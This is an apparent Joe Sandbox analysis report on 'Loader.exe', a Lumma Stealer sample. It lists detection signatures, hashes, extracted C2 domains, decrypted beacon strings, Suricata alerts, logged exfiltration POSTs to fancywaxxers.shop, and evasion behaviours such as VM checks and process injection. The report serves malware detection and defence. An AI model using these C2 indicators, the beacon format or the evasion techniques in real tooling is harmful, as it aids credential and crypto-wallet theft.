Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1582939
MD5:0792fce4557cae0687a02e5e41be587a
SHA1:1bac30844ed9b13082a7df999518b0cc59759278
SHA256:6e7b661fb3b6610bc026dd050824e7faaf3bd3b5fa0b168d941858fc694ba871
Tags:exeuser-Raidr
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 5164 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0792FCE4557CAE0687A02E5E41BE587A)
    • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 2588 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0792FCE4557CAE0687A02E5E41BE587A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop", "wholersorie.shop", "fancywaxxers.shop", "cloudewahsj.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "yau6Na--6524795094"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Loader.exe PID: 2588JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Loader.exe PID: 2588JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Loader.exe PID: 2588JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Loader.exe PID: 2588JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:56.188431+010020283713Unknown Traffic192.168.2.449730104.21.48.1443TCP
                2025-01-01T02:56:57.422798+010020283713Unknown Traffic192.168.2.449731104.21.48.1443TCP
                2025-01-01T02:56:58.724005+010020283713Unknown Traffic192.168.2.449732104.21.48.1443TCP
                2025-01-01T02:56:59.828044+010020283713Unknown Traffic192.168.2.449733104.21.48.1443TCP
                2025-01-01T02:57:01.065590+010020283713Unknown Traffic192.168.2.449734104.21.48.1443TCP
                2025-01-01T02:57:02.521703+010020283713Unknown Traffic192.168.2.449735104.21.48.1443TCP
                2025-01-01T02:57:04.160117+010020283713Unknown Traffic192.168.2.449736104.21.48.1443TCP
                2025-01-01T02:57:06.388204+010020283713Unknown Traffic192.168.2.449737104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:56.941241+010020546531A Network Trojan was detected192.168.2.449730104.21.48.1443TCP
                2025-01-01T02:56:57.893852+010020546531A Network Trojan was detected192.168.2.449731104.21.48.1443TCP
                2025-01-01T02:57:06.874165+010020546531A Network Trojan was detected192.168.2.449737104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:56.941241+010020498361A Network Trojan was detected192.168.2.449730104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:57.893852+010020498121A Network Trojan was detected192.168.2.449731104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:56.188431+010020586571Domain Observed Used for C2 Detected192.168.2.449730104.21.48.1443TCP
                2025-01-01T02:56:57.422798+010020586571Domain Observed Used for C2 Detected192.168.2.449731104.21.48.1443TCP
                2025-01-01T02:56:58.724005+010020586571Domain Observed Used for C2 Detected192.168.2.449732104.21.48.1443TCP
                2025-01-01T02:56:59.828044+010020586571Domain Observed Used for C2 Detected192.168.2.449733104.21.48.1443TCP
                2025-01-01T02:57:01.065590+010020586571Domain Observed Used for C2 Detected192.168.2.449734104.21.48.1443TCP
                2025-01-01T02:57:02.521703+010020586571Domain Observed Used for C2 Detected192.168.2.449735104.21.48.1443TCP
                2025-01-01T02:57:04.160117+010020586571Domain Observed Used for C2 Detected192.168.2.449736104.21.48.1443TCP
                2025-01-01T02:57:06.388204+010020586571Domain Observed Used for C2 Detected192.168.2.449737104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:56:55.706456+010020586561Domain Observed Used for C2 Detected192.168.2.4610801.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:57:00.384585+010020480941Malware Command and Control Activity Detected192.168.2.449733104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T02:57:04.233693+010028438641A Network Trojan was detected192.168.2.449736104.21.48.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop:443/apiackagesAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apilAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/AAAvira URL Cloud: Label: malware
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop", "wholersorie.shop", "fancywaxxers.shop", "cloudewahsj.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "yau6Na--6524795094"}
                Source: Loader.exeReversingLabs: Detection: 44%
                Source: Loader.exeVirustotal: Detection: 38%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.5% probability
                Source: Loader.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--6524795094
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00415270 CryptUnprotectData,2_2_00415270
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D4B6E8 FindFirstFileExW,0_2_00D4B6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D4B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D4B799
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043F950
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h2_2_00440980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_0040A9B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00415270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0000022Ah]2_2_00415270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp edx2_2_00422A28
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423288
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_0040CB18
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h2_2_00440BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7AAE27ECh]2_2_004224ED
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00418C90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], ebx2_2_00409DEC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F040
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]2_2_0042C055
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]2_2_00409814
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]2_2_00409814
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0041B839
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax2_2_004058C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax2_2_004058C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042A0A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx2_2_00428150
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00428150
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]2_2_00425784
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx2_2_0042796F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F130
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00419980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp+04h], eax2_2_00409240
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]2_2_00408A70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx2_2_0042BAC4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp eax, BFFFFFFFh2_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h2_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h2_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F2B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]2_2_00439B49
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00429B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]2_2_00402B70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F3E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h2_2_00439460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h2_2_00439460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then test eax, eax2_2_00439460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_0041DC10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h2_2_00440CD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00428490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042A500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041AD10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041E5F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]2_2_00421D90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h2_2_00423E61
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042C6D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042C675
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, ebx2_2_0042B693
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_0043F6A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, ecx2_2_00426740
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_00414760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_00414760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]2_2_00414760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-74590DBEh]2_2_00414760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]2_2_00426760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00426760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, ecx2_2_00416711
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]2_2_00409710
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]2_2_00409710
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042873A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, ecx2_2_00416FC4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00434FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]2_2_00425784
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax2_2_00417FB1

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:61080 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49736 -> 104.21.48.1:443
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.48.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0N84MEPGBSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18120Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OG750WXNTGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8741Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XC0RK74IM4TDJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20412Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3HXJG0UTZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDPI4RY1FL2OPHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586169Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
